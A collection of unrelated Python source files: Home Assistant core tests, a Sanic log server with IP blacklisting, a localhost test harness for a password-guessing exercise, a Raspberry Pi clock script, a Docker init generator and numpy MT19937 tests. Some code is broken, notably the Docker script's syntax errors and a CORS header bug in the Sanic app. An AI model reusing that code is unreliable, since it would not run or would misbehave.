self.assertEqual(old_count + 1, len(self.bus.listeners))
# Try deleting a non registered listener, nothing should happen
self.bus.remove_listener('test', lambda x: len)
# Remove listener
self.bus.remove_listener('test', listener)
self.assertEqual(old_count, len(self.bus.listeners))
# Try deleting listener while category doesn't exist either
self.bus.remove_listener('test', listener)
def test_listen_once_event(self):
""" Test listen_once_event method. """
runs = []
self.bus.listen_once('test_event', lambda x: runs.append(1))
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.bus._pool.add_worker()
self.bus._pool.block_till_done()
self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
""" Test EventBus methods. """
def test_init(self):
""" Test state.init """
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_copy(self):
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, state.copy())
def test_dict_conversion(self):
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
""" Test state.repr """
self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.states = ha.StateMachine(self.bus)
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.pool.stop()
def test_is_state(self):
""" Test is_state method. """
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_entity_ids(self):
""" Test get_entity_ids method. """
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
""" Test remove method. """
self.assertTrue('light.bowl' in self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.assertFalse('light.bowl' in self.states.entity_ids())
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
def test_track_change(self):
""" Test states.track_change. """
self.pool.add_worker()
# 2 lists to track how often our callbacks got called
specific_runs = []
wildcard_runs = []
self.states.track_change(
'light.Bowl', lambda a, b, c: specific_runs.append(1), 'on', 'off')
self.states.track_change(
'light.Bowl', lambda a, b, c: wildcard_runs.append(1),
ha.MATCH_ALL, ha.MATCH_ALL)
# Set same state should not trigger a state change/listener
self.states.set('light.Bowl', 'on')
self.bus._pool.block_till_done()
self.assertEqual(0, len(specific_runs))
self.assertEqual(0, len(wildcard_runs))
# State change off -> on
self.states.set('light.Bowl', 'off')
self.bus._pool.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
# State change off -> off
self.states.set('light.Bowl', 'off', {"some_attr": 1})
self.bus._pool.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
# State change off -> on
self.states.set('light.Bowl', 'on')
self.bus._pool.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
def test_case_insensitivty(self):
self.pool.add_worker()
runs = []
track_state_change(
ha._MockHA(self.bus), 'light.BoWl', lambda a, b, c: runs.append(1),
ha.MATCH_ALL, ha.MATCH_ALL)
self.states.set('light.BOWL', 'off')
self.bus._pool.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
state = self.states.get('light.Bowl')
time.sleep(1)
self.states.set("light.Bowl", "on")
self.assertEqual(state.last_changed,
self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
""" Test ServiceCall class. """
def test_repr(self):
""" Test repr method. """
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.services = ha.ServiceRegistry(self.bus, self.pool)
self.services.register("test_domain", "test_service", lambda x: None)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
if self.pool.worker_count:
self.pool.stop()
def test_has_service(self):
""" Test has_service method. """
self.assertTrue(
self.services.has_service("test_domain", "test_service"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
expected = {
'test_domain': ['test_service']
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
self.pool.add_worker()
self.pool.add_worker()
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
self.assertTrue(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(1, len(calls))
def test_call_with_blocking_not_done_in_time(self):
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(0, len(calls))
ha.SERVICE_CALL_LIMIT = orig_limit
def test_call_non_existing_with_blocking(self):
self.pool.add_worker()
self.pool.add_worker()
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'i_do_not_exist', blocking=True))
ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.config = ha.Config()
def test_config_dir_set_correct(self):
""" Test config dir set correct. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant"),
self.config.config_dir)
def test_path_with_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant", "test.conf"),
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(
os.path.join(data_dir, ".homeassistant", "dir", "test.conf"),
self.config.path("dir", "test.conf"))
def test_temperature_not_convert_if_no_preference(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_not_convert_if_invalid_value(self):
""" No unit conversion to happen if no preference. """
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
('25a', TEMP_CELCIUS),
self.config.temperature('25a', TEMP_CELCIUS))
def test_temperature_not_convert_if_invalid_unit(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, 'Invalid unit'),
self.config.temperature(25, 'Invalid unit'))
def test_temperature_to_convert_to_celcius(self):
self.config.temperature_unit = TEMP_CELCIUS
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(26.7, TEMP_CELCIUS),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_to_convert_to_fahrenheit(self):
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
(77, TEMP_FAHRENHEIT),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_as_dict(self):
expected = {
'latitude': None,
'longitude': None,
'temperature_unit': None,
'location_name': None,
'time_zone': 'UTC',
'components': [],
}
self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
def test_exception_during_job(self):
pool = ha.create_worker_pool(1)
def malicious_job(_):
raise Exception("Test breaking worker pool")
calls = []
def register_call(_):
calls.append(1)
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (malicious_job, None))
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (register_call, None))
pool.block_till_done()
self.assertEqual(1, len(calls))
|
app.py | # -- Imports --------------------------------------------------------------------------
from sanic import Sanic, Blueprint
from threading import Thread
from gspread import authorize
from oauth2client.service_account import ServiceAccountCredentials
from limits.strategies import FixedWindowElasticExpiryRateLimiter
from limits.storage import MemoryStorage, RedisStorage
from copy import copy
from .middlewares import middlewares
from .routes import blueprints
from .. import moca_modules as mzk
from .. import core
# -------------------------------------------------------------------------- Imports --
# -- App --------------------------------------------------------------------------
# Server header.
if 'server' not in map(lambda i: i.lower(), core.SERVER_CONFIG['headers'].keys()):
core.SERVER_CONFIG['headers']['Server'] = f'MocaFileLog({core.VERSION})'
# Access-Control-Allow-Credentials header.
if core.SERVER_CONFIG['access_control_allowed_credentials']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Credentials'] = True
else:
pass
# Access-Control-Allow-Headers header.
if '*' in core.SERVER_CONFIG['access_control_allow_headers']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Headers'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Headers'] = ', '.join(
core.SERVER_CONFIG['access_control_allow_headers']
)
# Access-Control-Allow-Methods header.
if '*' in core.SERVER_CONFIG['access_control_allowed_methods']:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Methods'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Allow-Methods'] = ', '.join(
core.SERVER_CONFIG['access_control_allowed_methods']
)
# Access-Control-Max-Age header.
core.SERVER_CONFIG['headers']['Access-Control-Allow-Methods'] = int(
core.SERVER_CONFIG['access_control_max_age']
)
# Access-Control-Expose-Headers
if '*' in core.SERVER_CONFIG['access_control_expose_headers']:
core.SERVER_CONFIG['headers']['Access-Control-Expose-Headers'] = '*'
else:
core.SERVER_CONFIG['headers']['Access-Control-Expose-Headers'] = ', '.join(
core.SERVER_CONFIG['access_control_expose_headers']
)
# Sanic App
moca_sanic: mzk.MocaSanic = mzk.MocaSanic(
f'MocaFileLog({core.VERSION})',
app=None,
host=None,
port=None,
unix=None,
ssl=None,
certfile=core.SERVER_CONFIG['ssl']['cert'],
keyfile=core.SERVER_CONFIG['ssl']['key'],
log_dir=core.LOG_DIR,
internal_key=None,
access_log=core.SERVER_CONFIG['access_log'],
log_level=core.SERVER_CONFIG['log_level'],
use_ipv6=None,
workers=1,
headers=core.SERVER_CONFIG['headers'],
debug=core.SERVER_CONFIG['debug'],
auto_reload=core.SERVER_CONFIG['auto_reload'],
websocket=True,
backlog=core.SERVER_CONFIG['backlog'],
origins=core.SERVER_CONFIG['access_control_allowed_origins'],
)
moca_sanic.load_sanic_server_configs(core.SANIC_CONFIG)
app: Sanic = moca_sanic.app
def run_app(name: str, host: str, port: int, use_ipv6: bool, file: str, level: int) -> None:
moca_sanic.app.blueprint(Blueprint.group(*blueprints, url_prefix=f'/moca-file-log/{name}'))
moca_sanic._host = host
moca_sanic._port = port
moca_sanic._use_ipv6 = use_ipv6
moca_sanic.app._log_name = name
moca_sanic.app._host = host
moca_sanic.app._port = port
moca_sanic.app._use_ipv6 = use_ipv6
moca_sanic.app._log_file_path = file
moca_sanic.app._log_level = level
moca_sanic.run()
# set event listener
async def before_server_start(app_: Sanic, loop):
mzk.set_process_name(f'MocaFileLog({core.VERSION}) --- {app_._log_name}')
mzk.print_info(f'Starting Sanic server. -- {mzk.get_my_pid()}')
app_.system_config: mzk.MocaConfig = mzk.MocaConfig(
core.SYSTEM_CONFIG, manual_reload=True
)
app_.ip_blacklist: mzk.MocaSynchronizedJSONListFile = mzk.MocaSynchronizedJSONListFile(
core.IP_BLACKLIST_FILE, manual_reload=True, remove_duplicates=True,
)
app_.api_key_config: mzk.MocaSynchronizedJSONListFile = mzk.MocaSynchronizedJSONListFile(
core.API_KEY_FILE, manual_reload=True
)
app_.dict_cache = {}
if app_._log_file_path.startswith('/'):
file = app_._log_file_path
else:
file = core.CLIENT_LOG_DIR.joinpath(app_._log_file_path)
app_.moca_log = mzk.MocaFileLog(file, app_._log_level)
app_.secure_log = mzk.MocaFileLog(core.LOG_DIR.joinpath('secure.log'))
app_.scheduler = mzk.MocaScheduler()
app_.log_list = []
if core.SERVER_CONFIG['rate_limiter_redis_storage'] is None:
app_._storage_for_rate_limiter = MemoryStorage()
else:
app_._storage_for_rate_limiter = RedisStorage(core.SERVER_CONFIG['rate_limiter_redis_storage'])
app_.rate_limiter = FixedWindowElasticExpiryRateLimiter(app_._storage_for_rate_limiter)
if core.LOG_CONFIG[app_._log_name].get('google_spread_sheets_auth', None) is not None:
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
app_._credentials = ServiceAccountCredentials.from_json_keyfile_name(
str(core.CONFIG_DIR.joinpath(core.LOG_CONFIG[app_._log_name].get('google_spread_sheets_auth'))),
scope,
)
app_._gc = authorize(app_._credentials)
app_.workbook = app_._gc.open_by_key(core.LOG_CONFIG[app_._log_name].get('spread_sheets_key'))
else:
app_.workbook = None
def __reload_timer(application: Sanic) -> None:
while True:
mzk.sleep(1)
application.system_config.reload_file()
application.ip_blacklist.reload_file()
application.api_key_config.reload_file()
app_._timer_thread = Thread(target=__reload_timer, args=(app_,), daemon=True)
app_._timer_thread.start()
async def after_server_start(app_: Sanic, loop):
mzk.print_info(f'Started Sanic server. -- {mzk.get_my_pid()}')
# run scheduled tasks.
def dos_detect():
info = copy(app_.dict_cache.get('dos-detect'))
app_.dict_cache['dos-detect'] = {}
if info is None:
return None
for ip, count in info.items():
if count > core.system_config.get_config('dos_detect', int, 5000):
app_.ip_blacklist.append(ip)
app_.secure_log.write_log(
f"Add {ip} to the blacklist. <dos_detection>",
mzk.LogLevel.WARNING
)
def sync_with_spread_sheets():
if len(app_.log_list) == 0:
return None
if app_.workbook is not None:
workbook = app_.workbook
if len(workbook.worksheets()) == 1 and not workbook.worksheets()[0].title.startswith('1-'):
workbook.add_worksheet(title='1-0', rows=5001, cols=3)
workbook.del_worksheet(workbook.worksheets()[0])
a1, b1, c1 = workbook.worksheets()[0].range('A1:C1')
a1.value, b1.value, c1.value = 'Level', 'Timestamp', 'Message'
workbook.worksheets()[0].update_cells([a1, b1, c1])
else:
latest = workbook.worksheets()[-1]
start, end = int(latest.title.split('-')[0]), int(latest.title.split('-')[1])
index = end - start + 3
if index == 5002:
workbook.add_worksheet(title=f'{end+1}-{end}', rows=5001, cols=3)
a1, b1, c1 = workbook.worksheets()[-1].range('A1:C1')
a1.value, b1.value, c1.value = 'Level', 'Timestamp', 'Message'
workbook.worksheets()[-1].update_cells([a1, b1, c1])
latest = workbook.worksheets()[-1]
start, end = int(latest.title.split('-')[0]), int(latest.title.split('-')[1])
index = end - start + 3
if (index + len(app_.log_list)) <= 5002:
log_list = app_.log_list
app_.log_list = []
else:
log_list = app_.log_list[:5002-index]
app_.log_list[:5002 - index] = []
cell_list = latest.range(f'A{index}:C{index + len(log_list)-1}')
i = 0
for level, timestamp, message in log_list:
cell_list[i].value, cell_list[i+1].value, cell_list[i+2].value = level, timestamp, message
i += 3
latest.update_cells(cell_list)
index += len(log_list)
latest.update_title(f'{start}-{index + start - 3}')
app_.scheduler.add_event_per_second('Dos-detect', dos_detect, 5)
app_.scheduler.add_event_per_second('Sync-With-Spread-Sheets', sync_with_spread_sheets, 5)
async def before_server_stop(app_: Sanic, loop):
mzk.print_info(f'Stopping Sanic server. -- {mzk.get_my_pid()}')
async def after_server_stop(app_: Sanic, loop):
mzk.print_info(f'Stopped Sanic server. -- {mzk.get_my_pid()}')
moca_sanic.before_server_start = before_server_start
moca_sanic.after_server_start = after_server_start
moca_sanic.before_server_stop = before_server_stop
moca_sanic.after_server_stop = after_server_stop
# Middleware
for item in middlewares.values():
moca_sanic.add_middleware(item[1], item[0])
# -------------------------------------------------------------------------- App --
|
tests.py | from hstest.stage_test import StageTest
from hstest.test_case import TestCase
from hstest.check_result import CheckResult
from hstest.exceptions import WrongAnswerException
from threading import Thread
from time import sleep
import socket
import random
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)
abc = 'abcdefghijklmnopqrstuvwxyz1234567890'
def random_password():
'''function - generating random password of length from 2 to 3'''
return ''.join(random.choice(abc) for i in range(random.randint(2, 3)))
class Hacking(StageTest):
def __init__(self, module):
super().__init__(module)
self.ready = False
self.sock = None
self.serv = None
self.connected = False
self.message = []
def start_server(self):
self.serv = Thread(target=lambda: self.server())
self.serv.start()
self.ready = False
while not self.ready:
try:
sleep(0.1) # socket needs to be set up before test
except KeyboardInterrupt:
pass
def stop_server(self):
self.sock.close()
self.serv.join()
def server(self):
''' creating a server and answering clients '''
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('localhost', 9090))
self.ready = True
try:
self.sock.listen(1)
conn, addr = self.sock.accept()
self.connected = True
conn.settimeout(15)
while True:
data = conn.recv(1024)
if not data:
break
self.message.append(data.decode('utf8'))
conn.send('Wrong password!'.encode('utf8'))
conn.close()
except:
pass
def generate(self):
self.start_server()
test_word = random_password()
return [
TestCase(
args=['localhost', '9090', test_word], attach=[test_word])
]
def check(self, reply, attach):
self.stop_server()
if not self.connected:
return CheckResult.wrong("You didn't connect to the server")
if len(self.message) == 0:
return CheckResult.wrong('You sent nothing to the server')
if len(reply) == 0:
return CheckResult.wrong(
'You did not print anything')
if reply.split('\n')[0] != 'Wrong password!':
return CheckResult.wrong(
'The line you printed is not the one sent by server')
if self.message != attach:
return CheckResult.wrong(
'You sent the wrong information to the server')
return CheckResult.correct()
if __name__ == '__main__':
test = Hacking('hacking.hack')
test.run_tests()
test.stop_server()
|
stuff.py | #!/usr/bin/env python
import time
from datetime import datetime
from datetime import timedelta
from datetime import date
import sys
import threading
import RPi.GPIO as GPIO
import Adafruit_DHT
from Adafruit_LED_Backpack import SevenSegment
import holidays
us_holidays = holidays.US()
holiday_list = [
'New Year\'s Day',
'New Year\'s Day (Observed)',
'Memorial Day',
'Independence Day',
'Independence Day (Observed)',
'Labor Day',
'Thanksgiving',
'Christmas Day',
'Christmas Day (Observed)'
]
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
BLUE_LED = 18
GREEN_LED = 23
GPIO.setup(BLUE_LED, GPIO.OUT)
GPIO.setup(GREEN_LED, GPIO.OUT)
left_display = SevenSegment.SevenSegment(address=0x71)
right_display = SevenSegment.SevenSegment(address=0x72)
left_display.begin()
right_display.begin()
sensor = Adafruit_DHT.DHT22
pin = 4
ctr = 0
start_date = datetime(2017, 6, 22, 0, 1, 1)
def update_temp():
humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
if temperature is not None:
right_display.clear()
right_display.set_colon(False)
right_display.print_float(temperature)
right_display.write_display()
def leds_on(now):
GPIO.output(BLUE_LED, True)
first = (start_date - timedelta(days=start_date.weekday()))
second = (now - timedelta(days=now.weekday()))
weeks = (first - second).days / 7
if weeks % 2 == 1:
GPIO.output(GREEN_LED, True)
def leds_off():
GPIO.output(BLUE_LED, False)
GPIO.output(GREEN_LED, False)
def update_time(now):
hour = now.hour
minute = now.minute
second = now.second
left_display.clear()
left_display.set_digit(0, int(hour / 10))
left_display.set_digit(1, hour % 10)
left_display.set_digit(2, int(minute / 10))
left_display.set_digit(3, minute % 10)
left_display.set_colon(second % 2)
left_display.write_display()
def holiday_week(day):
if holiday(day):
return True
else:
n = -1
for x in range(0, 3):
previous_day = day + timedelta(days=n)
if holiday(previous_day):
return True
n -= 1
return False
def holiday(day):
hol_test = us_holidays.get(day)
if hol_test in holiday_list:
return True
elif isinstance(hol_test, list):
return bool(set(holiday_list) & set(us_holidays.get(day)))
return False
print('Press Ctrl-C to quit.')
try:
while(True):
now = datetime.now()
# once every 30 seconds
if ctr == 120:
t = threading.Thread(target=update_temp)
t.start()
ctr = 0
leds_off()
weekday = now.weekday()
if weekday == 3:
# thursday
if not holiday_week(now):
leds_on(now)
elif weekday == 4:
# friday
previous_day = now + timedelta(days=-1)
if holiday_week(previous_day):
leds_on(now)
update_time(now)
time.sleep(0.25)
ctr += 1
finally:
GPIO.cleanup()
|
docker_xml_to_init.py | import xml.etree.ElementTree as ET
import sys
import uuid
from interscity_client import platform
from multiprocessing import Process
def register_car(generated_uuid):
car_builder.register(generated_uuid, "Car "+generated_uuid, ["city_traffic"])
if __name__ == '__main__':
RUNNING_ENV = os.get_env("RUNNING_ENV")
if (RUNNING_ENV == None):
raise("Please, define the env variable `RUNNING_ENV` with either `docker_test` or `production`").
xml_path = "local"
if (RUNNING_ENV=="docker_test"):
xml_path = "./validation/trips.xml"
else if (RUNNING_ENV=="production"):
xml_path = "./production/trips.xml"
XML_PATH = "./validation/trips.xml"
f = open("docker_validation.init", "a+")
nodes = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm']
computing_nodes = 13
conn = platform.connection()
if not conn.capability_available("city_traffic"):
conn.create_capability("city_traffic", "City Traffic", "sensor")
car_builder = platform.resource_builder(connection=conn, capability="city_traffic", uniq_key="uuid")
gen_id = 1
tree = ET.parse(XML_PATH).getroot()
for child in tree:
attrs = child.attrib
count_to_use = int(int(attrs["count"])/8)
for v in range(0, count_to_use):
generated_uuid = str(uuid.uuid4())
p = Process(target=register_car, args=(generated_uuid))
p.start()
payload = """
{{ class_Car, [#{{id => "{}", origin => "{}", destination => "{}", start_time => {}, start_link => "{}", uuid => "{}" }}], {} }}.
""".format(gen_id, attrs["origin"], attrs["destination"], attrs["start"], attrs["link_origin"], generated_uuid, nodes[(v%computing_nodes)])
f.write(payload)
gen_id += 1
sys.stdout.write('.')
f.close()
|
test_generator_mt19937.py | import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
